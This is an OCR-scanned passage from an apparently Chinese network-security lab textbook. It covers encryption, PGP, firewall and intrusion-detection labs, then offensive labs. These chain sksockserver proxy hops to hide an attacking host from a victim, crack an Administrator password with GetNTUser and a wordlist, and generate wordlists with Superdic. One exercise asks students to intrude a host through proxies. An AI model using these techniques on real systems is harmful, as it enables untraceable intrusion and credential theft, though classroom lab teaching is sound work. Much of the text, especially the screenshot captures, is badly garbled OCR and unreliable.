RSA (199) [D9TBSAAZF2F IEAFDDEAOEDTCSE3T5B854F4868D98D15524921504B03D0427273ED1A4 — «RÀ. 
KS (200) [EF7450CB0853973460447542330936CFUEUDFUEBD4A31383304AZBUAI2ZFFBXAAJECA — (48A. 


T 使用 ynE5t0 memo. oar LEE NR :| 


9-55 加密 过 程 


test. txt test. txt. ncs 
Hi9-s6 源 文件 和 加 密 文件 
解密 过 程 要 在 输入 文件 对 话 框 中 输入 已 经 加 密 的 文件 ,按钮 “加 密 ” 自 动 变 成 “解密 ”。 


选择 “ 模 n. txt”" 和 密 钥 ,解密 过 程 如 图 9-57 所 示 。 
解密 成 功 以 后 ,查看 源 文件 如 图 9-58 所 示 , 解 密 后 的 文件 如 图 9-59 所 示 。 
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图 9-57 解密 过 程 


图 9-58 源 文件 
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ET EET 
XP) REO 格式 @) EV Wb 
3bc123456789| 


图 9-59 解密 后 的 文件 
思考 题 : 比较 DES 算法 和 RSA 算法 的 不 同 。 


实验 九 ”PGP 加 密 文 件 和 邮件 


1. 实验 目的 

使 用 PGP 软件 可 以 简洁 而 高 效 地 实现 邮件 或 者 文件 的 加 密 `. 数 字 签名 。 

2. 实验 所 需 软件 

操作 系统 为 Windows XP 或 者 Windows Server。 

工具 软件 : PGP 8.1, 

3. 实验 步骤 

1) 使 用 PGP 加 密 文件 

本 书 第 4 章 4. 4. 2 节 已 经 介绍 了 PGP 软件 的 安装 和 密 钥 的 产生 ,这 里 就 不 再 重复 。 使 
用 PGP 可 以 加 密 本 地 文件 , 右 击 要 加 密 的 文件 ,选择 PGP 菜单 项 的 菜单 Encrypt, 如 图 9-60 
所 示 。 


图 9-60 选择 要 加 密 的 文件 
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出 现 对 话 框 , 让 用 户 选择 要 使 用 的 加 密 密 钥 , 选 中 所 需要 的 密 钥 , 单 击 OK 按钮 ,如 
图 9-61 所 示 。 


ÊS PGPshell - Key Selection Dialog 


|nalimeicmalimeifhebtu. edu. cn? Bl :04s/ :024 


[m ] cm | sw | 


图 9-61 选择 密 钥 
目标 文件 被 加 密 了 ,在 当前 目录 下 自动 产生 一 个 新 的 文件 ,如 图 9-62 所 示 。 


选择 题 . xls 选择 题 uso 
图 9-62 源 文件 和 加 密 后 的 文件 


打开 加 密 后 的 文件 时 ,程序 自动 要 求 输入 密码 ,输入 建立 该 密 钥 时 的 密码 ,如 图 9-63 所 示 。 


Message was encrypted to the following public keyís] : 


Enter passphrate for your private key : IV. Hide Typing 


9-63 ”解密 文件 时 要 求 输入 密码 


2) 使 用 PGP 加 密 邮 件 

PGP 的 主要 功能 是 加 密 邮 件 ,安装 完毕 后 ,PGP 自动 和 Outlook 或 者 Outlook Express 
关联 。 和 Outlook Express 关联 如 图 9-64 所 示 。 

利用 Outlook 建立 邮件 ,可 以 选择 利用 PGP 进行 加 密 和 签名 ,如 图 9-65 所 示 。 
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| ZAD Sp SEV IAD 邮件 (M) MENS 
| D IEA ME m 


AN 
PGheys 


OI 


图 9-65 加 密 邮 件 
思考 题 : 练习 使 用 PGP 加 密 和 解密 文件 及 邮件 。 


实验 十 “数字 签名 onSign 


1. 实验 目的 

我 们 平时 编辑 的 Word 文档 ,有 的 需要 进行 保密 ,为 防止 编写 好 的 Word 文档 被 别人 进 
行 恶 意 的 修改 ,我 们 可 以 使 用 数字 签名 对 其 进行 加 密 。onSign 是 一 款 通过 运行 宏 , 为 Word 
文档 添加 数字 签名 的 软件 ,可 以 检查 文档 是 否 被 人 修改 。 

2. 实验 所 需 软件 

操作 系统 为 Windows XP 或 者 Windows Server. 

工具 软件 : onSign 2.0。 
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3. 实验 步骤 

1) 软件 安装 

FR onSignV2. 0? 版 本 安装 文件 到 本 机 ,在 安装 界面 如 图 9-66 所 示 ,最 后 ,软件 会 弹出 
注册 窗口 ,我 们 只 需要 选择 Off-line 注册 方式 ,将 “姓名 ”和 “电子 邮箱 ” 必 填 信息 填写 好 ,并 
选择 “家 庭 用 户 ”, 就 可 以 免费 使 用 了 。 由 于 onSign 目前 的 版 本 是 针对 Word 2000 编写 的 ， 
在 Word 2003 中 安装 后 ,软件 不 会 将 onSign 菜单 添加 到 Word 文档 的 菜单 栏 中 ,在 编辑 带 
有 数字 签名 的 文档 时 ,需要 进入 onSign 的 安装 目录 ,双击 名 为 onSign 的 Word 模板 ,启用 
宏 后 就 可 以 使 用 了 。 

2) 设置 签名 

通过 onSign~>Sign Document 进入 软件 界面 , 单 击 Signature Wizard, 如 图 9-67 所 示 ， 
进入 设置 签名 向 导 , 可 以 通过 “图 像 "“ 电 子 邮件 ”和 “鼠标 ”三 种 方式 生成 签名 图 片 。 以 “图 
像 ” 方 式 为 例 , 先 制作 好 一 张 别人 不 易 效 仿 的 bmp 格式 个 性 签名 图 片 ,将 图 片 路 径 添加 到 
File Name 中 ,并 为 签名 图 片 设置 好 名 称 、 作 者 和 密码 ,就 完成 了 签名 图 片 的 设置 。 


Welcome to onSign 20 Viewer Setup program. 
This program wil instal onSign 2 0 Viewer on your 
computer. 


Thanks lor tying onSin 2.0 


Yaleome to 
Befere yos cun begin signing your electrenic documente 
wing eig. you must First crosta a CPS fila et year 
signature. A CES file enerypts the image ol 

To cresta your ovn CIS file, select the Signature 


If you already have a CPS file of your signature or 
qus vant to try out the sample CPS file, select the ifia 


Tete: tha parseerd for tha sengla CPS filo is: oyiga 


[7 Des t shovas thia Wi anya 


图 9-66 安装 界面 图 9-67 设置 签名 向 导 


3) 使 用 签名 
在 编辑 完 所 有 的 文档 并 保存 后 ,通过 onSign Sign Document 进入 软件 界面 , 单 击 Sign 
Now 并 输入 密码 ,就 可 以 为 文档 签署 数字 签名 了 ,如 图 9-68 所 示 。 


9-68 ”文档 签署 数字 签名 
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4) 检查 签名 

在 打开 经 过 数字 签名 的 文档 后 ,如 果 文 档 在 添加 了 数字 签名 后 未 被 修改 过 ,我 们 双击 数字 
签名 后 ,还 会 看 到 完整 的 签名 。 如 果 文 档 被 修改 过 ,软件 就 会 在 数字 签名 上 显示 红色 禁止 符号 。 

5) 几 点 说 明 

在 Word 2000 下 ,如 果 只 是 查看 数字 签名 的 话 , 我 们 可 以 根据 数字 签名 下 方 提供 的 链 
接 下 载 onSign Viewer, 就 不 需要 安装 onSign 了 。 但 是 如 果 您 使 用 的 是 Word 2003 ,建议 无 
论 是 添加 还 是 查看 数字 签名 ,都 使 用 onSign, 而 不 要 安装 onSign Viewer, 因为 onSign 
Viewer 安装 后 会 引起 Word 2003 和 onSign 的 不 正常 工作 。 

思考 题 : 练习 用 onSign 对 Word 文件 签名 。 


实验 十 一 “用 WinRouteFirewall 5 创建 包 过 小 规则 


1. 实验 目的 

用 WinRouteFirewall 5 创建 包 过 滤 规 则 : 禁止 使 用 ping 命令 ,禁用 FTP 访问 ,禁用 
HTTP 访问 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 192. 168. 2. 1, 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 2. 2, 

抓 包 软 件 Sniffer4. 7. 5/ Wireshark-win32-1. 4. 9 中 文 版 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : kerio-wrs-5. 0. 0-rc4-win. exe. 

3. 实验 步骤 

CD 一 个 可 靠 的 分 组 过 滤 防 火 墙 依赖 于 规则 集 ,我 们 定义 了 几 条 典型 的 规则 集 。 

第 一 条 规则 : 主机 10.1.1.1 任何 端 口 访问 任何 主机 的 任何 端口 ,基于 TCP 协议 的 数 
据 包 都 允许 通过 。 

第 二 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 的 任何 端口 ,基于 TCP 协议 的 数 
据 包 允许 通过 。 

第 三 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 端口 号 小 于 1024 的 端口 ,基于 
TCP 协议 的 数据 包 都 禁止 通过 。 

下 面 我 们 按照 规则 集 进行 设置 ,首先 安装 软件 。 

(2) 安装 : 以 管理 员 身 份 在 服务 器 上 安装 该 软件 ,双击 kerio-wrs-5. 0. 0-rc4-win. exe. 
安装 界面 如 图 9-69 所 示 。 

(3) 启动 : 安装 完毕 后 ,启动 WinRoute Administration, WinRoute 的 管理 界面 如 图 9-70 
所 示 。 
默认 情况 下 ,该 密码 为 空 。 单 击 按钮 OK, 进 入 系统 管理 。 当 系统 安装 完毕 以 后 ,该 主 
机 就 将 不 能 上 网 ,需要 修改 默认 设置 。 单 击 工具 栏 图 标 ,出 现 本 地 网 络 设置 对 话 框 ,然后 查 
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PT: TI 


Kerio WinRoute Firewall 5.0.0 RC 4 


[ETE 
lo the InstaliSheid Wizard for Keno 


Welcome 
Minfloute Frenat 5 00 TIC 4 


Ve vta es Weed veb atad Fono Vela 
Fooreal SD DPC 4 on pous compu. To connue cick 


J- “qme 


Configuration 


Enter a hostname or an IP address of a computer 
running WinRoute 


WinRoute Host ocdhost 了 


Username : [Admin 
Bassora | 


caca 


图 9-70 登录 界面 
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看 Ethernet 的 属性 ,将 两 个 复 选 框 全 部 选中 ,如 图 9-71 所 示 。 


KAk he Gd ss 


AID PCNET Family Eth.. 172 18.25.109 
0.00.0 


-Interface Description 
Nane < [MID FCNET Family Ethernet Ada 
Ea) cranes 172 18.25.109 
Mask ; 255.255.255.0 
Ethernet gp ddross 00-0c-29-9c-c6-ed 


Settings- 


M Perforn BT with the IF ddrens of this 
nterface on all comaunicatien passing 


9-71 更 改 默认 设置 


(4) 利用 WinRoute 创建 包 过 滤 规 则 ,创建 的 规则 内 容 是 : 防止 服务 器 被 别 的 计算 机 使 
用 ping 指令 探测 。 
选择 菜单 项 Packet Filter, 如 图 9-72 所 示 。 


图 9-72 ”选择 包 过 滤 菜单 项 


在 包 过 滤 对 话 框 中 可 以 看 出 目前 主机 还 没有 任何 的 包 规则 ,如 图 9-73 所 示 。 

选中 图 9-73 中 网 卡 图 标 , 单 击 Add 按钮 ,出 现 过 滤 规 则 添加 对 话 框 , 所 有 的 过 滤 规 则 
都 在 此 处 添加 ,如 图 9-74 所 示 。 

因为 ping 指令 用 的 协议 是 ICMP ,所 以 这 里 要 对 ICMP 协议 设置 过 滤 规 则 。 在 协议 下 
拉 列 表 中 选择 ICMP ,如 图 9-75 所 示 。 
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图 9-75 添加 ICMP 的 过 滤 规 则 
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在 ICMP Types 栏目 中 ,将 复 选 框 全 部 选中 。 在 Action 栏目 中 ,选择 单 选 框 Drop。 在 
Log Packet 栏目 中 选中 Log into windo, 设 置 完毕 后 单 击 OK 按钮 ,一 条 规则 就 创建 完毕 ， 
如 图 9-76 所 示 。 


Packet Description 


DICEN 0x 


trcs REN =] 
Source Destination 
Type [iny ires z] Type fany sairess z 


[ AN F Echo Reply [7 Redirect — [V Time Exceeded [V Param, Probler | | 
F7 Echo Request [V Unreachable [7 Source Quench 


-Aetion r Log Packet 一 Valid at 
C Pergit P 
| T IURE Tise [Oir 中 
C Tr [e] 
ma | 


9-76 编辑 过 滤 规 则 
为 了 使 设置 的 规则 生效 , 单 击 * 应 用 ?按钮 ,如 图 9-77 所 示 。 
Packet Filter 
Incoming | Outgoing | 
E M) AND FCNET Family Ethernet Adapter 
E p im adapter 
5 S linel 


田 写 Any interface 


9-77 使 规则 生效 


设置 完毕 ,客户 机 对 服务 器 使 用 ping 指令 时 ,服务 器 就 不 再 响应 外 界 的 ping 指令 了 ， 
使 用 ping 来 探测 主机 ,将 收 不 到 回应 ,如 图 9-78 所 示 。 

虽然 服务 器 没有 响应 ,但 是 已 经 将 事件 记录 到 安全 日 志 了 。 选 择 菜 单 栏 View 下 的 菜 
单项 Logs Security Logs, 查 看 日 志 纪 录 。 

G) 用 WinRoute 禁用 FTP 访问 。FTP 服务 用 TCP 协议 ,FTP 占用 TCP 的 21 端口 ， 
服务 器 的 IP 地 址 是 192. 168. 2. 2, 创 建 规则 如 表 9-2 所 示 。 


*À 
e 
地 
$ 
A 
N 
加 


C:\Documents and Settings\hdninistratoryping 192.168.2.2 


Pinging 192.168.2.2 with 32 bytes of data: 


[Request timed out. 
equest tined out. 


E 9-78 ping 服务 器 


59-2 禁用 FTP 访问 


组 序号 动作 源 IP 目的 IP 源 端口 目的 端口 协议 类 型 
1 禁止 * 192. 168. 2. 2 * 21 TCP 


利用 WinRoute 建立 访问 规则 ,如 图 9-79 所 示 。 


[CT xi 


Packet Description 


trc [RN | 
Source Bestination 
Type [uy eres 可 Tri 可 
IF Máress[192. 168. 2. 2 
Part [iay z] Pors [ina t 9 HR 
TCP Flags 
[^ Only gstablizhed TCP connection 
[7 Only establishing TCF connecti: 
Action Log Packet Valid at 


C Pergit 


C Dep 8.  — Tine [Olvers) =] 


G Dey F Log into gindo 


Cancel 
9-79 设置 禁用 FTP 访问 规则 


设置 访问 规则 以 后 ,再 访问 服务 器 192. 168. 2. 2 的 FTP 服务 ,将 遭 到 拒绝 ,如 图 9-80 
所 示 。 访 问 违反 了 访问 规则 ,会 在 主机 的 安全 日 志 


C:V»ftp 192.168.2.2 
> ftp: connect :连接 被 拒绝 
ftp? 


图 9-80 访问 FTP 服务 


(6) 用 WinRoute 禁用 HTTP 访问 。HTTP 服务 用 TCP 协议 ,占用 TCP 协议 的 80 端 
口 , 服 务 器 的 IP 地 址 是 192. 168. 2. 2. 首 先 创建 规则 如 表 9-3 所 示 。 
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表 9-3 禁用 HTTP 访问 规则 
组 序号 动作 源 IP 目的 IP 源 端 口 目的 端口 协议 类 型 


1 禁止 * 192. 168. 2.2 * 80 TCP 


利用 WinRoute 建立 访问 规则 ,如 图 9-81 所 示 。 
FTIR 5 


Packet Deseription. 


77 ERN =] 
Dwe — Destination 
ype [uy address 三 Type [os z] 
IF hddress[192. 168. 2. 2 
Part [a - Porg fege to (0 到 180 
HICE Fises 


[7 Only gstablished TCP connectior 
T7 Orly establishing TCP emraecti, 


Aetion Lee Pochet Yia m 
C Pornit F teg into £ 
Tise [D z] 
G ed F Loc into winds CTT 
ll 


图 9-81 禁用 HTTP 访问 规则 


打开 本 地 的 IE, 连 接 远 程 主机 的 HTTP 服务 ,将 遭 到 拒绝 ,如 图 9-82 所 示 。 访 问 违反 
了 访问 规则 ,所 以 在 主机 的 安全 日 志 中 记录 下 来 。 


9-82 不 能 打开 服务 器 的 网 页 


思考 题 : 

1. 运用 WinRouteFirewall 5 自己 定义 防火 墙 的 规则 集 并 实现 。 

2. 编写 防火 墙 规 则 : 禁止 除 管理 员 计 算 机 (IP 为 202. 206. 25.110) 外 任何 一 台 计算 机 
访问 某 主机 (IP 为 202. 206. 25. 111) 的 终端 服务 (TCP 端口 为 3389) 。 
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实验 十 二 “人 侵 检 测 系统 工具 BlackICE 和 “ 冰 之 眼 ” 


1. 实验 目的 

利用 工具 BlackICE 和 * 冰 之 眼 ? 对 网 络 情况 进行 实时 检测 。 

2. 实验 所 需 软件 

操作 系统 ， Windows XP, Windows Server, 

工具 软件 : bidserver. exe 和 ”* 冰 之 眼 ”。 

3. 实验 步骤 

(1) BlackICE: 双击 bidserver. exe, 如 图 9-83 所 示 , 在 安装 过 程 中 需要 输入 序列 号 ,如 
图 9-84 所 示 ,序列 号 在 ROR. NFO 文件 中 。 


bidserver. exe 
MEE BIackICE Intrusi 
Sa] Network ICE 


图 9-83 安装 文件 


Network ICE BlackICE Setup Server Version 2.9.car 


BlackICE Server License 


Enter the Network ICE license key for your installation. Your license key is the held labeled. 
Serial Number on your Receipt and Proof ol Purchase. 


License — [55ES2A2RS.E4495 


图 9-84 输入 序列 号 


BlackICE 是 一 个 小 型 的 入侵 检测 工具 ,在 计算 机 上 安全 完毕 后 ,会 在 操作 系统 的 状态 
栏 右 下 角 显 示 一 个 图 标 黑 , 当 有 异常 网 络 情况 的 时 候 , 图 标 就 会 跳动 。 主 界面 如 图 9-85 所 
示 , 在 Events 选项 卡 下 显示 网 络 的 实时 情况 ; 选择 Intruders 选项 卡 , 可 以 查看 主机 入 侵 的 
详细 信息 ,如 IP.MAC DNS 等 ,如 图 9-86 所 示 。 

(2) 冰 之 眼 :“ 冰 之 眼 ? 网 络 人 侵 检 测 系统 是 NSFOCUS 系列 安全 软件 中 一 款 专门 针对 
网 络 遭 受 黑客 攻击 行为 而 研制 的 网 络 安全 产品 ,该 产品 可 最 大 限度 地 、 全 天 候 地 监控 企业 级 
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Amn mid fee comm se, 
9-85 BlackICE 的 主 界面 


zmz 
Ele Edt yew Ioos Help oo 
Events Intruders | History | 


192. 168. 1.6 


图 9-86 查看 入 侵 者 的 详细 信息 


网 络 的 安全 。 双 击 图 9-87 中 的 autoexec. exe 文件 进行 安装 , 先 选择 安装 冰 之 眼 公 共 库 ,如 
图 9-88 所 示 ,然后 安装 冰 之 眼 控制 台 。 

安装 成 功 后 就 可 以 在 程序 中 执行 ,如 图 9-89 所 示 , 控 制 台 启 动 成 功 后 如 图 9-90 所 示 ， 
系统 管理 人 员 可 以 自动 地 监控 网 络 的 数据 流 、 主 机 的 日 志 等 ,对 可 疑 的 事件 给 予 检 测 和 响 
应 ,在 内 联网 和 外 联网 的 主机 和 网 络 遭 受 破坏 之 前 阻止 非法 的 入 侵 行为 。 
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LJ Wupsrorri c2 LJ IDEPSdk 
LJ IDSAeentForWin2k LJ IlSbase 


IDSConsole bd IDSFirewall Adapter 


autorun. exe autorun ico 

vwd: DEL 2 z 32 

38 Ol AClSee 9.0 100 Me 
f autorun. inf 

TSERE 

1 KP 


9-87 ”安装 所 需要 的 文件 


2 A ERN EURO. 
Tek «ld Firerd 


TENERE 


Windows2000 Advanced Server 


图 9-89 启动 冰 之 眼 控制 台 
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| 


wom 
ge-vsmisszsee 


Hi9-90 冰 之 眼 软件 主 界面 
思考 题 : 对 某 一 台 装 有 入 侵 检测 工具 的 机 器 进行 扫描 ,攻击 等 实验 ,查看 入 侵 检 测 系 统 


的 反应 ,并 编写 实验 报告 。 
实验 十 三 ”IP 隐藏 工具 Hide IP Easy 


1. 实验 目的 
隐藏 你 的 真实 的 IP, 防 止 你 的 网 上 活动 被 监视 或 个 人 信息 的 被 黑客 窃取 。 


2. 实验 所 需 软 件 

HERI: Windows XP, Windows Server, 

工具 软件 : Hide IP Easy, 

3. 实验 步骤 

安装 所 需要 的 软件 如 图 9-91, 双 击 HideIPEasy. exe 文件 安装 ,安装 界面 如 图 9-92 , 启 
动 界 面 如 图 9-93 所 示 , 单 击 Hide IP 可 以 隐藏 本 机 的 IP. 


È HideIPEasy-rar — WinRAR 
文件 @) $90 IAG KERO WA EHW 
| < y 
LATET, 
添加 。 解压 到 w 查看 EE LI f dame wa 
[E  Biuaarnsy re - RAR 压 钨 文件 ， 解 包 大 小 为 4, 615. 531 FP 
名 称 o 


O skins 
Dres 

IE 

日 使 用 更 新 说 明 txt 

E PFE. hta 

Chi deIPEasy. exe 3,814,712 
回 ffextension xpi 4,545 
i const. dat 1,536 
< 


3x 


Eit 3 文件 天 和 3,870,661 FB G 个 文件 】 - 


图 9-91 安装 需要 的 软件 
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| Hide IP Easy 5.3.3.6 Setup 


Hidep EASY] Welcome to the Hide IP Easy Setup 


Wizard 


This wizard wil guide you through the installation of Hide IP 
Easy 5.3.3.6 


Click Next to continue. 


图 9-92 安装 界面 


图 9-93 启动 界面 
思考 题 : 如 何 验证 IP 地 址 隐藏 ? 


实验 十 四 ”利用 跳板 网 络 实现 网 络 隐身 


很 多 防火 墙 或 IDS 有 追溯 功能 , 即 可 以 通过 代理 跳板 主机 找到 真实 黑客 的 功能 。 不 过 
这 种 功能 有 追溯 层 数 的 限制 ,一 旦 代理 跳板 的 层 数 超过 防火 墙 或 和 侵 检测 系统 追溯 层 数 的 
设置 时 ,受害 主机 还 是 无 法 发 现 真 实 的 黑客 。 所 以 ,一 方面 黑客 需要 不 断 地 找到 多 个 代理 跳 
板 以 构成 尽量 多 层次 的 代理 网 络 , 另 一 方面 受害 主机 的 防火 墙 和 入 侵 检测 系统 也 要 设置 尽 
量 高 的 追溯 层 数 来 对 付 黑客 。 

1. 实验 目的 

了 解 并 掌握 二 级 跳板 及 多 级 跳板 (跳板 网 络 ) 的 制作 方法 ,掌握 跳板 网 络 形成 后 黑客 主 
机 对 受害 主机 的 访问 效果 。 
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2. 实验 设备 
5 台 Windows Server 2003 主机 ,192. 168. 5. 9 为 受害 机 ,192. 168.5. 5 为 黑客 机 ,192. 
168. 5. 6 为 一 级 跳板 ,192. 168. 5.7 为 二 级 跳板 ,192. 168. 5. 8 为 三 级 跳板 。 
(1) 黑客 机 上 安装 Skserver 服务 ,并 设置 开启 服务 。 
CD 找到 Sksockserver. exe 所 在 的 目录 ,输入 Sksockserver. exe -install。 
© 输入 sksockserver -config port 10000, 


# 


© 输入 sksockserver -config starttype 2。 
CD 输入 net start skserver( 如 图 9-94 所 示 ) 。 


ocuments and Settings Wdninistrator2CD/ 


[C:\Documents and Settings Adninistrator>CD\ 


Service 服务 正 
Sinple TCP Service ERRATE 


图 9-94 安装 跳板 服务 器 


(2) 在 一 级 跳板 机 上 ,运行 skservergui. exe, 打 开 skservergui 服务 ， 单 击 “配置 ?菜单 一 
“经 过 的 SkServer”, 把 -级 ,二 级 ,三 级 跳板 添加 进去 ,端口 为 1813 ,选中 下 允许 ,如 图 9-95 
所 示 。 


-|Blxi 
B xi 
| Active | Dese | 
T = 
t 
T 
T [192 163 58 DAO fisis v ptm uB 
BE [ LT 
: sam | wmm| omm ok Cancel E 


图 9-95 设置 一 级 代理 服务 器 
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(3) 在 二 级 跳板 机 上 真 机 环境 的 界面 运行 skservergui. exe 程序 ,打开 skservergui 服 
务 , 单 击 “ 配 置 ”菜单 ~“ 经 过 的 SkServer”, 把 本 机 和 三 级 跳板 添加 进去 ,端口 为 1813, 选 中 
王 人 允许, 如 图 9-96 所 示 。 


192.168.5 T 
192.168.5.8 


I fisz es BRO fiais [v pti 


图 9-96 设置 二 级 代理 服务 器 


(4) 在 准备 成 为 三 级 跳板 的 主机 上 安装 Skserver 服务 ,并 设置 开启 服务 。 

CD 输入 sksockserver -install。 

© 输入 net start skserver, 

(5) 在 黑客 机 上 ,打开 skservergui 服务 , 单 击 * 配 置 "菜单 "经 过 的 SkServer". d — AX 
跳板 添加 进去 ,端口 为 1813 ,选中 王 允许 ,如 图 9-97 所 示 。 之 后 保存 设置 ,重启 服务 。 


图 9-97 设置 三 级 代理 服务 器 


(6) 在 黑客 机 上 使 用 sockservercfg 制作 代理 网 络 。 

CD 在 黑客 机 上 运行 并 打开 sockservercfg 王 “经 过 的 跳板 ”选项 卡 ,在 此 处 依次 添加 跳板 
的 IP、 端 口号 (将 三 个 级 别 跳 板 的 TP. 地 址 和 端口 加 入 ) ,选中 *E 允许 ”一 确定 ,如 图 9-98 
所 示 。 
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Snake 的 sock 代 理 一 设置 程序 


r p E 
[sziess [115 pto al 


[ws ] x | | ww | 
9-98 ”黑客 机 上 使 用 sockservercfg 制作 代理 网 络 
© 重启 黑客 本 机 的 Skserver 服务 。 
(7) 测试 : 


(D 黑客 机 在 Sockscap 界面 中 双击 IE, 在 IE 地址 栏 中 输入 受害 主机 的 IP( 受 害 主机 事 
先 设置 了 Web 共享 ) ,访问 成 功 ,如 图 9-99 所 示 。 


IAES ep /se 163.5. 9/ 


ZSFRECNASITRRINAT, TEEER TH CIEOROTRORMAG. 


SMGEORIUSS. PIE CSbURB , ENERE. 


JORTAFUAUTRS, BUTTER TURUEURR , END 15 
帮助 中 的 BRTERESSAS. 


要 访问 rns wm 


sagem. AESSR. 

TINTE, NO. ineteer。 必 出 现 TIS EUER. 
namas, s: . 

4 本 击 Internet 信息 服务 。 


到 
El Lr 
PE TE X nece [greens Erer dul? CEJ 


9-99 ”访问 受害 主机 的 IP 


O 受害 主机 在 自己 的 DOS 命令 行 中 运行 netstat -an, 无 法 发 现 真 正 的 黑客 机 
192.168. 5. 5 与 其 80 端口 相连 的 任何 迹象 (只 能 发 现代 理 跳板 主机 192. 168. 5. 8 与 受害 机 
的 80 端口 相连 ), 如 图 9-100 所 示 。 


TIME_WAIT 


C:\Documents and $ 


图 9-100 验证 


思考 题 ; 使 用 二 级 网 络 跳板 对 某 主 机 进行 和 侵 。 
实验 十 五 ”用 户 名 和 密码 扫描 工具 GetNTUser 


1. 实验 目的 

扫描 要 攻击 的 主机 的 用 户 名 和 密码 ,车 用 户 已 设置 登录 密码 可 以 使 用 指定 “密码 字典 ” 
猜测 密码 或 字典 生成 器 (实验 十 六 介绍 ), 从 而 得 到 受 攻击 的 主机 的 用 户 名 和 密码 。 

2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 172. 19. 25. 110, 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 172. 19. 25. 102 。 

实验 时 ,如果 没有 两 台 机 器 .可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

[ 具 软 件 : Get NTUser. exe, dic. txt 

3. 实验 步骤 

A) 打开 GetNTUser. exe 并 添加 主机 ,如 图 9-101 所 示 

(2) 对 全 地 址 为 172. 19. 25. 102 的 服务 器 进行 扫描 ,添加 服务 器 的 下 地址 ,如 图 9-102 
所 示 。 

(3) 单 击 OK 成 功 添加 ,并 单 击 工具 栏 扫描 图 标 , 扫 描 结果 如 图 9-103 所 示 。 

(4) 使 用 密码 字典 获取 服务 器 的 密码 : 首先 生成 密码 字典 文件 ,密码 字典 为 文本 文件 
dict. txt, 把 你 认为 是 密码 的 字符 或 数字 写 到 密码 字典 中 ,如 图 9-104 所 示 。 

后 选择 密码 字典 文件 ,选择 菜单 栏 “ 工 具 ? 下 的 菜单 项 “设置 >, 如 图 9-105 所 示 , 选 择 

MR 9-106 所 示 。 
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ts 于 标题 - ECetNTUzer 


ud] «m IAD Ew 
LX v Awt 
x 四 

Ed 


退出 QD) 


9-101 软件 界面 


ax golar 


fensa 
Cancel 


9-102 ”添加 主机 


GetNTUser 
XAD WE IAV Who 
ax ge taar 
Host List 

B mme 


127.0.0.1 
172. 19.25. 102 


9-103 ”扫描 到 服务 器 的 用 户 名 
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INO MMO SEV MO MO 


9-104 ”密码 字典 


[D m 


XM&O flett 
xMASo. [文本 文件 6660 了 RA 


图 9-106 选择 密码 字典 文件 
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(5) 利用 密码 字典 中 的 密码 进行 系统 破解 ,选择 菜单 栏 * 工 具 ” 下 的 菜单 项 “字典 测试 ”， 
如 图 9-107 所 示 。 


- GetNIUser 


XD ABV IAV WR 


FARN Administrator a10215 
9-107 破解 出 来 用 户 密码 


总 结 : 在 字典 中 有 Administrator 的 密码 ,是 123 ,这 样 就 得 到 了 系统 的 权限 。 这 种 方法 
的 缺点 是 ,如 果 对 方 用 户 密码 设置 比较 长 而 且 怪 , 就 很 难 猜 解 成 功 。 猜 解 需要 根据 字典 中 字 
典 的 密码 项 ,字典 在 此 充当 了 一 个 重要 的 角色 。 优 点 是 系统 的 一 些 弱 口令 ,比如 空 密 码 等 ， 
都 是 可 以 扫描 出 来 的 。 

思考 题 : 

l. 用 net 命令 建立 用 户 ,并 设置 密码 。 

2. 用 GetNTUser 扫描 1 题 中 的 密码 ,能 否 扫描 出 来 ”说 明 原因 。 


实验 十 六 ”Superdic( 超 级 字典 文件 生成 器 ) 


1. 实验 目的 

学 会 使 用 超级 字典 文件 生成 器 生成 需要 的 密码 字典 ,从 而 提供 给 需要 利用 密码 字典 破 
解密 码 的 软件 使 用 。 

2. 实验 所 需 软件 

系统 要 求 : Windows XP / All。 

工具 软件 : superdic. exe. 

3. 实验 步骤 

(1) 打开 superdic. exe, 如 图 9-108 所 示 : 

(2) 可 以 选择 的 字典 内 容 如 图 9-109 所 示 , 选 中 在 密码 中 可 能 有 的 字符 ,如 图 9-110、 
图 9-111 所 示 。 

(3) 选择 生成 字典 的 存档 位 置 ,如 图 9-112 所 示 。 
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9-110 选中 的 字典 内 容 
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O EEEH BDFAFRE V3.2 (KEM) 
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9-111 选择 生日 作为 字典 内 容 


D] EARP RETAKE 73, 2 (未 注册 ) 
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9-112 ”生成 字典 的 存档 位 置 


(4) 我 们 也 可 以 修改 密码 字典 ,如 图 9-113 所 示 ,注意 : 如 果 选 择 的 内 容 比 较 多 的 话 , 生 
成 的 字典 文件 占 的 存储 空间 会 比较 大 ,如 图 9-114 所 示 。 
DI 易 优 软 件 一 超级 字 奥 生成 器 _Y3. 2 《未 注册 》 


关于 “| 基本 字符 | 自 定义 | 生日 | 生成 字 身 ”修改 字 仙 | 注册 | 
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图 9-113 修改 密码 字典 
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您 的 磁 参 没有 足够 的 字 间 , 请 绒 小 生成 字 奥 或 更 的 弛 动 器 1!! 


b 


图 9-114 生成 大 的 密码 字典 
(5) 我 们 也 可 以 修改 字典 生成 比较 小 的 密码 字典 文本 ,元 余 的 字符 最 好 少 些 。 
总 结 : 这 类 生成 字典 的 软件 比较 容易 操作 ,密码 字典 的 内 容 根据 个 人 需要 添加 时 应 减 
少 不 必 要 的 字符 ,以 节省 存储 空间 并 且 加 快 密码 生成 的 速度 。 
思考 题 : 比较 选择 字符 和 数字 的 位 数 不 同 ,生成 的 密码 大 小 差别 很 大 吗 ? 


实验 十 七 ”共享 目录 扫描 Shed 


1. 实验 目的 
学 会 利用 工具 软件 Shed 来 扫描 对 方 的 计算 机 提供 哪些 目录 共享 。 
2. 实验 所 需 软 件 


客户 机 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 172. 19. 25. 1 。 

